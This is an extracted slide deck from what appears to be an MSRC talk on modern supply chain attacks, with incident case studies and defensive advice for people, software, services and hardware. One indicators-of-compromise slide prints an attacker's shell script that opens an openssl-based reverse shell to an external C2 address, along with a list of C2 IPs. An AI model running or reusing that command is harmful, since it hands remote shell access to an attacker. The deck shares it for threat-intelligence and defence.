###### The Enemy Within Modern Supply Chain Attacks Eric Doerr, GM Microsoft Security Response Center (MSRC) @edoerr ----- ###### We all know the world rests on a giant turtle… ----- ###### way down… ----- #### I’m in your supply chain, and you’re in mine. We’re in this together. ----- ###### Am I in your supply chain? ##### Are you in mine? ###### • Linux is the most popular OS on Azure • >35k unique OSS projects • >10K 3[rd] party tools • Surface, Hololens, Xbox hardware suppliers • Server infrastructure in the Microsoft cloud ----- ###### Media is overly focused on hardware Supply chain > hardware ----- ###### I’m not talking about… OR And definitely not ----- ### Evaluating supply chain risk ----- ###### How we think about Supply Chain Risk Hardware Software Services People ----- ## How do we defend Microsoft? ###### Commonalities & differences ----- ###### Number of Number of countries Authentication employees with Microsoft offices requests per month Managed devices On-premises Microsoft Teams hitting the workload reduction meetings/month630B network Transactions on Data Centers Cloud based services the sales platform worldwide100+842K per day ----- ###### Microsoft Cloud140Countries54Regions ----- #### Microsoft is a complex company to defend… how do we do it? ----- ###### • Centralized hubs for cybersecurity and defense; uniting personnel from each defender team • Shared technology, analytics, playbooks • Shared locations, and more importantly a commitment to “defend together” • 24 x 7 x 365 protection of Microsoft platform and customers ----- ###### People ### Let’s talk about people ----- ###### There are people in your supply chain ----- ###### Gift Card abuse During unknown time period, a financially motivated threat actor allegedly compromises Wipro network and gains access to multiple companies through trusted vendor relationships **3[rd]** **PARTY** **REPORTING** ###### 2 Apr 2019 CDOC teams mobilized based on reports of potential compromise to determine the risk exposure of to Microsoft and Microsoft customers. **Credential** **compromise** **Backdoor** **Lateral** **C&C** **movement** Microsoft Vendors 3 **(People)** **Apr 2019 After a thorough** investigation, no malicious activity observed within Microsoft.Potential Impact **Response** ###### • Risk assessment and vendor inventory audit performed • Block newly identified malicious domains • Precautionary reset of credentials for vendor accounts • Additional monitoring of systems belonging vendor employees • Windows Defender signature deployed to detect adversary’s specific Mimikatz Binary ----- ###### Practical Advice Securing people in your supply chain • Always “assume breach” • Strict inventory of vendor & partner access • Automated policy governance where possible • Follow principle of least privilege • Provide devices and/or virtual monitoring • Any privileged access needs tighter controls (MFA etc) and detection systems in place ----- ###### Software ### Let’s talk about software ----- ###### There is software in your supply chain ----- **April 2018 Reports that Team Viewer** software and/or infrastructure is leveraged by threat actor **BACKDOOR** **SUPPLY CHAIN** **ATTACK** **OEM** **2** OEMs use service for provisioning and troubleshooting of physical machines Threat Actor could leverage service to **4** install firmware or bios implants on physical machines during OEM deployment **MALICIOUS** **CODE** ###### 3[rd] Party Service Service is connected to internal resources for deployment of new hardware **May 2018** AppLocker and firewall blocking initiated against service files and connections Machines are re-imaged prior to delivery or deployment ###### Potential Actions on Objective **Physical** **Machine** Theoretically an implant could remain after provisioning: - **Steal data** - **Disrupt or deny access** - **Distribute and Manage Malware** **Response** ###### • Performed audit of software usage to assess risk if software was compromised • Update policy to block remote access software • Notifications sent to impacted employees • AppLocker and firewall blocks put in place • Updated contracts with suppliers ----- ###### Practical Advice Securing Software in your supply chain Pre-Selection Selection Contract Onboard Monitor Terminate Shortlist software _Risk Profiling &_ _Standard Contract_ _Remediation_ _Risk Profiling_ _Termination Support_ solutions and _Assessment Services_ _Language Review &_ Ensure customers/ _Continuous_ suppliers with strong _Contract Negotiation_ business groups are _Monitoring_ Implement necessary security credentials. Enable the selection _Consulting_ aware of any ongoing safeguards for of software solutions expectations related Perform monitoring solutions being Kick off security and suppliers which Apply enforceable to their chosen and periodic re- decommissioned and engagements during adhere to defined terms to contracts in software solutions assessments based provide termination RFP and shortlisting Microsoft Security relation to Microsoft and suppliers. on the status of and support. phase. requirements. Security and Privacy changes to the risk Ensure suppliers are requirements. profiles. Perform periodic committed to the Perform security review of software requirements set assurance prior to Investigate changes solution usage and forth for their contract negotiations in risk assessment contract information software solutions to enable customers/ and move to to identify solutions and organization, and business groups to termination if they which are inactive or their responsibility to make risk-based cannot be quickly expected to be remediate any known decision. addressed. decommissioned. or open issues. ----- ###### Services ### Let’s talk about services ----- #### Do you inventory every service you use? ----- ###### Upstream vs. Downstream Upstream Downstream • DNS • Financial outsourcing • PKI • Content delivery networks • Cloud service providers • Distribution services (e.g. Github, Dropbox, etc.) • VPN service providers • Push networks • ISPs • Any business partner that helps • Any business partner you rely you provide services to your on to provide you services ----- **MULTI-FACTOR** **AUTHENTICATION** **MULTI-FACTOR** **AUTHENTICATION** highlighting security research reporting an exposed database associated with an SMS subprocessor. **SCANNING** ###### Sub-processors **Phone Number** **Phone Number** **Phone Number** **Access Code** Telco Provider **Access Code** **Access Code** ###### 2 The data exposed encompassed SMS messages containing phone numbers and short-term access codes. **ERROR, NEGLECT** **LEAK/EXFILTRATE DATA** **ACTIONS ON THE** **OBJECTIVE** **Response** ###### • Inspected exposed data to evaluate risk • Expired all valid one-time tokens immediately to contain risk • Work began to investigate the scope and impact of the potential disclosure • Investigated potential attempted or successful logins • No misuse of the two-factor codes was identified ----- ###### Hardware ### Ok, let’s talk about hardware ----- ###### 4 Compromised account logged in to IP addresses associated with IOT devices telephony from external VPNs. **Security control** **Credential** **evasion** **compromise** **BackdoorC&C** ###### 5 Incident Responders reset passwords, pull the hard disk of the printer, and block known domains. **Apr 2019 The Microsoft Threat** Intelligence Center (MSTIC) discovered suspicious activity from infrastructure previously associated with the STRONTIUM targeting several 3[rd] party customers. Internet facing video decoder device with default credentials used to establish a link into targeted networks. VPN **ACTIONS ON THE** **OBJECTIVE** credentials used to establish into targeted **RECONNAISSANCE** **Response** ###### • Mobilized CDOC responders to investigate and partner with 3[rd] party customer security teams • IOT devices were quarantined and sent for forensic analysis • Impacted service account credentials were changed • Malicious domains and IPs were blocked on affected networks • Proactively shared adversary TTPs with IOT vendors ###### IoT ----- ###### Indicators of Compromise (1/2) —contents of [IOT Device] file-- #!/bin/sh export [IOT Device] ="-qws -display :1 -nomouse" echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh && break; done| openssl s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((`cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f 'openssl'); fi);done)&' & ----- ###### Indicators of Compromise (2/2) The following IP addresses are believed to have been used by the actor for command and control (C2): 167.114.153.55 94.237.37.28 82.118.242.171 31.220.61.251 128.199.199.187 More details on our blog https://msrc- blog.microsoft.com/2019/08/05/corporate ----- ### 4 Takeaways ----- # 1 ## Share More #### Let’s make the adversaries work harder by working together. ----- ###### How can we share more? We need to change our cultural approach • Media: “name and shame”  “learn and defend together” • Customer: “why was there an issue”  “how did they respond?” • Business: “containment & opacity”  “partnership & transparency” • Disclosure: “code defects”  “tactics that work” ----- # 2 ## Response matters #### We should focus more on how companies respond to security events, not whether they happen. ----- ###### Remember, we’re all in this together Best Practices: • Proactively inform customer of impact • Engage transparently and without defensiveness • Respond to reasonable requests for validation • Learn from mistakes ----- # 3 ## Sweat the small stuff #### Adversaries will find the path of least resistance. ----- # 4 ## Embrace the whole #### People + Software + Services + Hardware = Supply Chain ----- ### Thanks! -----